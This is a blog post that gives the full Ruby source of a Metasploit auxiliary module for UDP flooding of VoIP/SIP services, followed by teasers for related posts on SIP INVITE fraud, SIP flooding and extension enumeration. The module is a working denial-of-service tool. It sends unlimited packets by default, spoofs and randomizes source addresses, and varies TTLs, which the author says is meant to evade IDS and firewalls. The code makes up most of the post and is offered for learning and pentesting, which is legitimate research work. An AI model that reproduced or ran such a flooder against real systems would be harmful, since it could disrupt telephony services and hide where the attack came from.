Skip to main content

My first Metasploit module: UDP Flooder

There are very few Metasploit modules, neither Auxiliaries nor Exploits, VoIP related so I have in mind to write some of them in my free time. Today I want to share a UDP flooder Aux. module, which is very simple but perfect for learning, UDPFlooder is one of the many tools covered in "Hacking VoIP Exposed" book, considered a reference in this field.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos
include Msf::Exploit::Capture

def initialize
super(
'Name' => 'UDP Flooder',
'Description' => 'A simple UDP flooder',
'Author' => 'Jesus Perez',
'License'     => MSF_LICENSE,
'Version' => '$Revision: 0 $')

 register_options(
[
Opt::RPORT(5060),
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of UDP packets to send (else unlimited)']),
OptInt.new('SIZE', [false, 'Size of UDP packets to send (else 256 bytes)'])
], self.class)
deregister_options('FILTER','PCAPFILE','SNAPLEN')
end

def sport
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
end

def rport
datastore['RPORT'].to_i
end

def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end

def size
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
end

def run
open_pcap

sent = 0
num = datastore['NUM']

print_status("UDP flooding #{rhost}:#{rport}...")

p = PacketFu::UDPPacket.new
p.ip_daddr = rhost
p.udp_dport = rport

while (num <= 0) or (sent < num)
p.ip_ttl = rand(128)+128
p.ip_saddr = srchost
p.udp_sport = sport
p.payload = rand(36**size).to_s(36)
p.recalc
capture_sendto(p,rhost)
sent += 1
end

close_pcap
end
end
--------------------------------------------------------------------------

Most of the code is taken from Metasploit TCP SYN Flooder module but I made some more changes besides adapting it to UDP. The same way TTL is changed in each packet, I prefer to change the source (spoofed) address too because of the same reason (IDS/Firewall evasion). Moreover, in this case something to send is needed so I added the new option SIZE which determines the lenght of this random string. Another different thing you could apprecciate is that option SNAPLEN is unregistered too because of having no sense in this module.


Figure: Usage information

Finally, in order to test if module works fine I´m going to sniff the interface and see, with help of Wireshark, what it´s really happening. Next picture shows that everything seems to be working as defined in the description of the attack. :)



Figures: Sniffed packets

Jesús Pérez
Labels:

Popular posts from this blog

SIP INVITE attack with Metasploit

Some days ago my friend  @pepeluxx  wrote  another post  about INVITE attacks. He spoke about a  @sinologic   project  which allows to everybody passing some security tests to SIP servers. Furthermore he also published a perl script to do the same task. So I implemented it on Metasploit because I think It could be really useful during a pentesting. It’s interesting because these attacks are really dangerous, normally, attackers try to call to expensive locations. This target numbers often have special charges and they make money with this. Here there are two well known examples: http://blog.sipvicious.org/2010/12/11-million-euro-loss-in-voip-fraud-and.html http://snapvoip.blogspot.com.es/2009/02/calls-to-cuba-and-voip-attacks.html I’m not going to deep in this vector because of being a well known (and old!!) one. Basically the attacker tries to make a call using a misconfigured PBX. This is allowed because  SIP RFC  says that an ...
Read more

Flooding Asterisk, Freeswitch and Kamailio with Metasploit

Hi, it has been a long time since my last post because of my new job and my final year project ("VoIP denegation of service attacks" for curious) but there is something I found during my tests with  Freeswitch ,  Kamailio  and  Asterisk  that I want to share. NOTE: Really, guys of  Security By Default  blog published us (my good friend Roi Mallo and me) two articles about how to develop modules for Metasploit framework, another two are coming.  ;) During my project, among others, I developed a Metasploit module which can flood SIP protocol with common frames (INVITE, OPTIONS, REGISTER, BYE), I wrote it at Quobis (nice job ;) in order to use it for some private tests because actual software didn´t fit our needs, so we are going to probe how is the behavior of different GPL VoIP servers against this kind of attacks: - Asterisk: I think it needs no introduction, the famous softswitch/PBX software. - Freeswitch: It´s a newer soft...
Read more

SIP extension enumeration in Bluebox-ng

There are some well known SIP extension enumeration vulnerabilities in different VoIP servers, specially in Asterisk. This brute-force vector is based on the study of the authentication responses of the target server. Sometimes its replies are different in the case that the client uses a valid extension, so it's easy to discover them. This vector is normally classified as a low security risk. Moreover we're moving towards a federated SIP environment , in which the extension is the public email address of the user. But it's still important in some cases: To guide next steps during a penetration test. In example, you can use the discovered extension to reduce the number of attempts in the phase of SIP extensión brute-force. Some RCE (Remote Code Execution) exploits need a valid extension to work. After a little research, these are the known vulns: CVE-2009-3727 : It's quite old and it's practically not present in real environments. It's still not imple...
Read more